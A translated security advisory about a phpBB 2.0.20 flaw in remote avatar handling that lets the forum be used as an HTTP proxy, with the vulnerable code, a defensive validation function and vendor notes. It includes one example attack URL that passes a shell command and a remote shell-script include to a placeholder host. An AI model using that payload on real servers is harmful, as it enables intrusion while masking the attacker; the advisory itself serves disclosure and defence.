Source: myhack58 (MYHACK58:6220069344), author: Anonymous
Published: May 26, 2006 - 12:00 a.m.

phpBB can be used as an HTTP proxy (vulnerability warning)


Affected system:
phpBB Group phpBB 2.0.20
Description:
--------------------------------------------------------------------------------
BUGTRAQ ID: 17965

phpBB is a widely used open-source Web forum written in PHP. It supports several database backends, including Oracle, MSSQL, MySQL and PostgreSQL.

phpBB does not properly validate user-supplied input when processing avatar requests. A remote attacker could exploit this to use the phpBB server as an HTTP proxy and so hide the real source of an attack against a CGI script on another host.

In phpBB's usercp_avatar.php, lines 125-153:


    // Remote avatar: the user-supplied URL is split by this regex into
    // (1) scheme, (2) host, (3) port and (4) path; nothing else is checked.
    if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )
    {
        if ( empty($url_ary[4]) )
        {
            $error = true;
            $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];
            return;
        }

        // The path is passed through unchanged, including any "?" or "&".
        $base_get = '/' . $url_ary[4];
        $port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;

        if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )
        {
            $error = true;
            $error_msg = ( !empty($error_msg) ) ? $error_msg . '<br />' . $lang['No_connection_URL'] : $lang['No_connection_URL'];
            return;
        }

        // The forum server itself issues the request to the user-chosen host.
        @fputs($fsock, "GET $base_get HTTP/1.1\r\n");
        @fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");
        @fputs($fsock, "Connection: close\r\n\r\n");

        unset($avatar_data);
        while ( !@feof($fsock) )
        {
            $avatar_data .= @fread($fsock, $board_config['avatar_filesize']);
        }
        @fclose($fsock);

phpBB does not check that the user-supplied value ends in an image file extension, nor does it check whether the string contains the "&" or "?" characters, so an attacker can submit a value such as:

http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt

phpBB will perform the following GET request:

GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0
HOST: some_vulnerable.host
Connection: close

phpBB is thus turned into an HTTP proxy that reaches a third party's Web server on the attacker's behalf.
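As an added example (not phpBB's own code), the same regex from usercp_avatar.php is followed here by the two checks the advisory says the 2.0.20 code lacks: an image-extension check on the path and a rejection of "?" and "&". The loopback/private-address check on IP-literal hosts is an extra assumption of mine, and the sample URLs are constructed from the advisory's placeholders.

```php
<?php
// Added example, not code from phpBB. Validates a remote avatar URL
// before the forum would open a socket to it.
function check_remote_avatar_url($avatar_filename)
{
    // Same pattern as phpBB 2.0.20: (1) scheme, (2) host, (3) port, (4) path.
    if ( !preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )
    {
        return 'Incomplete_URL';
    }
    $host = $url_ary[2];
    $path = $url_ary[4];

    if ( $path === '' )
    {
        return 'Incomplete_URL';
    }
    // Missing check 1: no query string or parameter separators, so the forum
    // cannot be made to relay "?cmd=...&xpl=..." to a CGI script elsewhere.
    if ( strpbrk($path, '?&#') !== false )
    {
        return 'Query_characters_forbidden';
    }
    // Missing check 2: the path must end in a graphical file extension.
    if ( !preg_match('/\.(gif|jpe?g|png)$/i', $path) )
    {
        return 'Not_an_image_extension';
    }
    // Extra hardening (assumption): refuse "localhost" and IP literals in
    // private or reserved ranges. Hostnames that resolve to internal
    // addresses are not covered by this offline check.
    if ( strtolower($host) === 'localhost' )
    {
        return 'Non_public_host';
    }
    if ( filter_var($host, FILTER_VALIDATE_IP) !== false
        && filter_var($host, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false )
    {
        return 'Non_public_host';
    }
    return 'ok';
}

// Constructed inputs: the advisory's proxying URL, a loopback literal and a plain image URL.
$samples = array(
    'http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt',
    'http://127.0.0.1/avatar.gif',
    'http://some_vulnerable.host/images/avatar.png',
);
foreach ( $samples as $u )
{
    echo $u, ' => ', check_remote_avatar_url($u), "\n";
}
```

The first sample is rejected for its "?" and "&" before any socket is opened, the second for its loopback host, and only the third is accepted.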

<*Source: rgod ([email protected])

Links: http://marc.theaimsgroup.com/?l=bugtraq&m=114746905805341&w=2
http://marc.theaimsgroup.com/?l=bugtraq&m=114771082404483&w=2
*>

Recommendations:
--------------------------------------------------------------------------------
Vendor patch:

phpBB Group
-----------
The vendor has not yet released a patch or upgrade procedure; users of this software are advised to check the vendor's home page for the latest version:

http://www.phpbb.com/